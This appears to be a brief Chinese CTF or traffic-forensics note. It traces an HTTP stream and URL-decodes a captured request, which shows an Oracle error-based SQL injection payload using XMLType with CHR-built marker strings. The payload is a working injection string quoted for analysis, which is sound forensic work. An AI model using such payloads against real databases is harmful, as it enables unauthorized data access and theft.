追踪长度为 640 的 Http 流得到：
id=1%20AND%209278%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289278%3D9278%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29
HTTP/1.1
Url 解码得到：
id=1 AND 9278=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (9278=9278) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL)

<:
qbzqq
qjbxq
>
